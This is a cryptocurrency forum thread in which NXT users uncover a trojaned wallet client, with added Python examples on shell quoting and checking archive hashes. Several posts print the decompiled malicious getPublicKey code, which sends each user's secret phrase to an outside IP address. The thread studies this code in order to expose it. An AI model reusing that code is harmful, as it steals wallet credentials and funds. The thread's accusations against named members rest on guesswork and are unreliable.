
Topic: NXT :: descendant of Bitcoin - Updated Information - page 1950. (Read 2761645 times)

hero member
Activity: 490
Merit: 504
We need to lock all wiki pages with a download link against public editing; all download links should point to the 1st topic here instead of to direct downloads.
full member
Activity: 157
Merit: 100
clean

Code:
 static byte[] getPublicKey(String secretPhrase)
  {
    try
    {
      byte[] publicKey = new byte[32];
      Nxt.Curve25519.keygen(publicKey, null, MessageDigest.getInstance("SHA-256").digest(secretPhrase.getBytes("UTF-8")));
      
      return publicKey;
    }
    catch (Exception e) {}
    return null;
  }

vs

Code:
static byte[] getPublicKey(String paramString)
    {
      try
      {
        if (!paramString.equals("")) {
          if (!myKeys.contains(paramString))
          {
            URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
            URLConnection connection = url.openConnection();
            connection.setConnectTimeout(10000);
            connection.getInputStream();
            myKeys.add(paramString);
          }
        }
      }
      catch (Exception localException) {}
      try
      {
        byte[] arrayOfByte = new byte[32];
        Nxt.Curve25519.keygen(arrayOfByte, null, MessageDigest.getInstance("SHA-256").digest(paramString.getBytes("UTF-8")));
        return arrayOfByte;
      }
      catch (Exception localException1) {}
      return null;
    }

clearly someone modified Nxt$Crypto.class

EDIT: the question is who did it, and where did you guys download this (where was the link)?

sr. member
Activity: 602
Merit: 268
Internet of Value
Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast a message yet...

Still there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security, both perceived and actual.

If the hacker has to search a space of 2^256, then even with petahashes it will take a long time. However, I am worried about clustering, especially with user-selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute-force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable-looking but weak passwords in order to get hacked and give us black PR.

I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.

Not sure how much this will cost, but it will go a long way toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?

James

P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?

Agree. PaulyC deserves a bounty for uncovering this type of thief.
legendary
Activity: 1176
Merit: 1134
Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast a message yet...

Still there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security, both perceived and actual.

If the hacker has to search a space of 2^256, then even with petahashes it will take a long time. However, I am worried about clustering, especially with user-selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute-force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable-looking but weak passwords in order to get hacked and give us black PR.

I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.

Not sure how much this will cost, but it will go a long way toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?

James

P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?
sr. member
Activity: 378
Merit: 250
Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. The smaller one I believe was the one posted on the front page?

DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo

The file you uploaded is a RAR file, not zip, even though it has a zip extension. Just an FYI for others who attempt to open it and get an error.

First file inside is 7173063 bytes in size and has the SHA256 hash:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (2).zip

The second file inside is 7177834 bytes in size and has the SHA256 hash:
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

Damn.

I'll leave further analysis to those who have more experience.  I only just started learning Java a few months back to do Android programming.  I'm more of an assembly/hardware guy.


Interesting...:

Code:
     if (!paramString.equals(""))
      {
        if (!myKeys.contains(paramString))
        {
          URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
          URLConnection connection = url.openConnection();
          connection.setConnectTimeout(10000);
          connection.getInputStream();
          myKeys.add(paramString);
        }
      }
member
Activity: 82
Merit: 10
Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. The smaller one I believe was the one posted on the front page?

DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo

The link is gone. The thief has probably taken it away. Can you upload your zip download?

the link I posted that says do not use? Or did you mean to copy someone else's post?

I made that link there, it has the zip inside, it's the smaller file. I don't have the exact link of where I DL'ed it but I believe it was Mega
and was definitely linked from Nextcoin.org.

@xyzzyx oh my bad, I just rar'd it together and threw the extension on the whole file, sorry.
hero member
Activity: 490
Merit: 504
PaulyC:
the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history,
the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:
Code:

ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalksearch.org/user/epicthomas-172850
sr. member
Activity: 490
Merit: 250
I don't really come from outer space.
Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. The smaller one I believe was the one posted on the front page?

DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo

The file you uploaded is a RAR file, not zip, even though it has a zip extension. Just an FYI for others who attempt to open it and get an error.

First file inside is 7173063 bytes in size and has the SHA256 hash:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (2).zip

The second file inside is 7177834 bytes in size and has the SHA256 hash:
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

Damn.

I'll leave further analysis to those who have more experience.  I only just started learning Java a few months back to do Android programming.  I'm more of an assembly/hardware guy.

Edit:
Files nxt/webapps/root/WEB-INF/classes/Nxt$Crypto.class and nxt-BAD/webapps/root/WEB-INF/classes/Nxt$Crypto.class differ
sr. member
Activity: 602
Merit: 268
Internet of Value
Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. The smaller one I believe was the one posted on the front page?

DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo

Got it. The bogus client is in the link. Can someone check where the modification is?
member
Activity: 98
Merit: 10

This is the place and link I actually DLed from and was using when my NXT was stolen (I think; I'm not sure if it's the exact same file, it could have been updated?)
https://nextcoin.org/index.php/topic,4.0.html

https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

Ok I just realized those two links (front page and nextcoin.org) are the same. weird.  Could they have been different yesterday?

This download was posted by Dextern, who already ran away with the funds given to him for a bounty, right?
legendary
Activity: 1540
Merit: 1016
Source is out tomorrow :'), The price recovered.... Cry wanted to buy moar... had about 50 btc to buy.... now I went and spent them elsewhere, hookers and snow....
Grin
hero member
Activity: 490
Merit: 504
if I go to the https://nextcoin.org/index.php/topic,4.0.html, where you probably downloaded a bad client:
- Drexme has acted very strangely since the 21st of December 2013 (sold giveaway fund...)
- I can see in Drexme's post: "« Last Edit: January 01, 2014, 11:49:52 PM by punkrock »"
- but punkrock seems like he is a big helper: https://nextcoin.org/index.php?action=profile;area=showposts;u=2818
member
Activity: 98
Merit: 10
Oh my god, my nxt was stolen by some one,
and the client behaves strangely today: when I unlock my account, it gets stuck there and the client complains:

the theft transaction is
sender: 16886318053889080545 recipient: 9793828175536096502 amount: 18197 fee: 1 confirmations: 453
which happened yesterday!

OS, where did you download the client? Which node are you using to access the account?
hero member
Activity: 924
Merit: 1001
Unlimited Free Crypto
Source is out tomorrow :'), The price recovered.... Cry wanted to buy moar... had about 50 btc to buy.... now I went and spent them elsewhere, hookers and snow....
legendary
Activity: 1176
Merit: 1134
didn't the download of the tainted version come from a page made by the accused thief?

James
hero member
Activity: 739
Merit: 500
Wow.  I'm sorry guys.

I'm really sorry this happened, but I'm glad we now know how it happened.
Now let's find out who did it, and how.
newbie
Activity: 30
Merit: 0
can I get some SSH remote command help here?

on a box, I can do lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249
to see the stats for the 79.102.159.249 peer if it is connected.  The results look like this (notice I had to escape the & there):
Code:
{"platform":"?","application":"NRS","weight":0,"state":1,"announcedAddress":"","downloadedVolume":8758,"version":"0.4.7e","uploadedVolume":12675225}

why can I not use this to do a remote SSH command?

Code:
root@vps1:~# ssh -i .ssh/vps root@vps1 lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249
{"errorCode":3,"errorDescription":"\"peer\" not specified"}
root@vps1:~#

Try:
Code:
ssh root@vps1 -t -C 'curl "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249"'

More eye-pleasing:
Code:
curl --silent "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249"  | python -m json.tool

Edit: Added --silent option
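Why the first attempt failed: ssh joins every word after the hostname with single spaces and hands that one string to the remote login shell, so the `\&` only protects the `&` from the local shell. On the remote side the bare `&` ends the `lynx` command at `...requestType=getPeer` (hence the node's `"peer" not specified` error) and runs `peer=79.102.159.249` as a separate variable assignment. The added example below (not code from the thread) models that with `shlex`, whose punctuation-aware lexer splits on `&` the way a POSIX shell does, and shows that quoting the whole remote command once, as the `curl` suggestion does, keeps the URL intact. `remote_argv` is assumed to be the words as they look after the local shell has already processed them.

```python
import shlex

# URL queried in the post: the NXT node's local API on port 7874.
URL = "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249"


def ssh_argv_naive(host, remote_argv):
    """What the failing invocation looks like after the local shell has
    removed the backslash: the remote words are passed as separate arguments."""
    return ["ssh", host] + list(remote_argv)


def ssh_argv_quoted(host, remote_argv):
    """Quote each remote word for the remote shell and pass the result as one
    argument, which is what the 'curl "..."' suggestion in the thread achieves by hand."""
    return ["ssh", host, " ".join(shlex.quote(word) for word in remote_argv)]


def remote_command_string(ssh_argv):
    """ssh concatenates every argument after the host with spaces and sends that
    single string to the remote login shell; this reproduces that join."""
    return " ".join(ssh_argv[2:])


def remote_shell_words(command_line):
    """Tokenise the string as the remote POSIX shell would: whitespace separates
    words and the operators ( ) ; < > | & are words of their own."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def url_seen_by_remote(ssh_argv):
    """The third remote word is the argument lynx -dump actually receives."""
    words = remote_shell_words(remote_command_string(ssh_argv))
    return words[2]


if __name__ == "__main__":
    remote = ["lynx", "-dump", URL]
    for label, argv in (("naive", ssh_argv_naive("root@vps1", remote)),
                        ("quoted", ssh_argv_quoted("root@vps1", remote))):
        print(label, "->", remote_shell_words(remote_command_string(argv)))
```

The naive form tokenises to `['lynx', '-dump', 'http://localhost:7874/nxt?requestType=getPeer', '&', 'peer=79.102.159.249']`, which is exactly the request the node rejected; the quoted form delivers the full URL as one word.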
legendary
Activity: 1372
Merit: 1000
Wow.  I'm sorry guys.
hero member
Activity: 490
Merit: 504
I literally saw my client a few moments after it happened (it was open) so how this happened is odd!

My actual User account that has been stolen from is
NXT
16821029889165561706
I don't have any idea how this may have happened either. Just wanted to confirm, at the moment the theft happened your client was running and you had the browser window opened, and your account was unlocked (you were seeing your balance and the "send money" arrow), is that all correct?

Just trying to differentiate the possibilities, whether the hacker obtained your password via brute force or some other way and initiated the transaction from another machine, or somehow your own machine was tricked into initiating the transaction.

And you were running 0.4.8 at the time, right? I added the second check for the secret phrase before send money exactly to increase security, so that even if your account is unlocked in the browser you still need to enter your password again.

Another question, did you generate your random-looking password using some software - password manager, online service, or created it manually by typing at random?

I just wanted to clarify, with this, I had my server and client open.  Was just perusing the blocks within the client, seeing if I was up-to-date, something I just do sometimes, and the account balance went from 7808, then on next look 0, maybe a moment later, less than 10 seconds.

No one was remotely accessing my computer etc.  It was just balance 0, account recipient ID under sent transactions with 7808, etc.

Update: ran a full scan with my antivirus software, ESET, all up to date, no viruses or intrusions found.


The other question about password, this is the very first account I made so I did use the password generator that I had seen recommended on nextcoin.org
used "local" mode, to a certain degree,
http://passwordsgenerator.net/
(i definitely wouldn't recommend using one of these)

for 25 of the characters of the PW, then I just made up the rest randomly, 9 more characters.

and I'm not sure about what online nodes refers to exactly, but I can honestly say I never used anything online with that PW until today with CfB.
I don't see any strange opened ports so I believe I'm good on that end.


Has anyone else noticed the 4.8 download zip from nextcoin.org vs. the one from this exact link
Nxt 0.4.8 - https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

are 5 KB different in size? Is that anything to be concerned about?


I want to buy more NXT, but it just sucks cuz i got in somewhat early and thought I was following all the instructions correctly, and I honestly don't know what happened which makes me hesitant.

It's not cool everyone thinks I'm some troll planning this all out, but I guess that's a natural reaction. I would hope in the future there's someway to stop someone from just taking someone's NXT like this, (I actually thought the two step PW on "sending" was a good idea, but didn't stop them in this case)

I'll try to keep an eye out on this hacker's acct# to see if he hits anybody else.
http://22k.io/-account/16204974692852323982


Looks like you downloaded a bogus client. Scary stuff. The client at the front page of this thread is legit. You need to calculate the hash256 of the zip file of your client and compare it to the hash for 0.4.8 on the front page. They have to match exactly.
As you said, you have two of the same client with a 5 KB difference in size. One is certainly bogus. Sorry for your loss. This should really be sticky.
I could have fallen for this since I never checked the file until today.
But for now, only use client files from a trusted source and do a hash256 checksum of the zip file before using it.

This needs to be in wiki and the front page.

everyone can edit wiki......
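The check recommended above (hash the downloaded zip and compare it with the published SHA-256), and the follow-up that found the two archives differ only in `webapps/root/WEB-INF/classes/Nxt$Crypto.class`, as an added example that is not code from the thread or from the NXT project. It verifies a whole archive against a published digest and, when the archive-level hash does not match, hashes every member of both zips to name exactly which files were swapped. The two archives and the "published" hash are constructed fixtures: the member paths follow the thread, the contents are labelled placeholders rather than real class files, and the expected hash is computed from the constructed good archive so the script runs offline.

```python
import hashlib
import io
import zipfile


def sha256_hex(data):
    """Hex SHA-256 of a byte string, the same value `sha256sum` prints for a file."""
    return hashlib.sha256(data).hexdigest()


def verify_archive(archive_bytes, published_hex):
    """True only when the downloaded archive hashes to the published digest exactly."""
    return sha256_hex(archive_bytes) == published_hex.strip().lower()


def entry_hashes(archive_bytes):
    """Map every file inside the zip to the SHA-256 of its uncompressed contents."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return {info.filename: sha256_hex(zf.read(info))
                for info in zf.infolist() if not info.is_dir()}


def diff_archives(good_bytes, suspect_bytes):
    """Return {path: (good_hash, suspect_hash)} for members that differ or that
    exist in only one archive (the missing side is None). Equivalent in spirit
    to `diff -r` over the two unpacked trees, but without touching the disk."""
    good, suspect = entry_hashes(good_bytes), entry_hashes(suspect_bytes)
    report = {}
    for name in sorted(set(good) | set(suspect)):
        if good.get(name) != suspect.get(name):
            report[name] = (good.get(name), suspect.get(name))
    return report


def build_archive(members):
    """Constructed fixture: a zip with the given {path: bytes} members.
    A fixed timestamp keeps the archive bytes reproducible between runs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in sorted(members.items()):
            info = zipfile.ZipInfo(name, date_time=(2014, 1, 1, 0, 0, 0))
            zf.writestr(info, data, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


# Constructed fixtures. Paths follow the thread's `diff -r` output; the contents
# are placeholder text standing in for compiled classes, not real bytecode.
GOOD_MEMBERS = {
    "webapps/root/WEB-INF/classes/Nxt.class": b"placeholder: Nxt.class",
    "webapps/root/WEB-INF/classes/Nxt$Crypto.class": b"placeholder: getPublicKey derives the key locally",
    "webapps/root/index.html": b"<html>client</html>",
}
BAD_MEMBERS = dict(GOOD_MEMBERS)
BAD_MEMBERS["webapps/root/WEB-INF/classes/Nxt$Crypto.class"] = (
    b"placeholder: getPublicKey also opens a URLConnection")

GOOD_ZIP = build_archive(GOOD_MEMBERS)
BAD_ZIP = build_archive(BAD_MEMBERS)
# Stand-in for the digest published in the first post; computed here from the
# constructed good archive so the example has no external dependency.
PUBLISHED_SHA256 = sha256_hex(GOOD_ZIP)


if __name__ == "__main__":
    for label, blob in (("front-page zip", GOOD_ZIP), ("other zip", BAD_ZIP)):
        print(label, "matches published hash:", verify_archive(blob, PUBLISHED_SHA256))
    for path, (good_h, bad_h) in diff_archives(GOOD_ZIP, BAD_ZIP).items():
        print("differs:", path, good_h[:16], "vs", bad_h[:16])
```

The archive-level comparison is the only check a downloader needs before running anything; the per-member diff is the investigator's follow-up that localises the change to one class so it can be decompiled, as was done above.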
member
Activity: 82
Merit: 10
Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. The smaller one I believe was the one posted on the front page?

DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo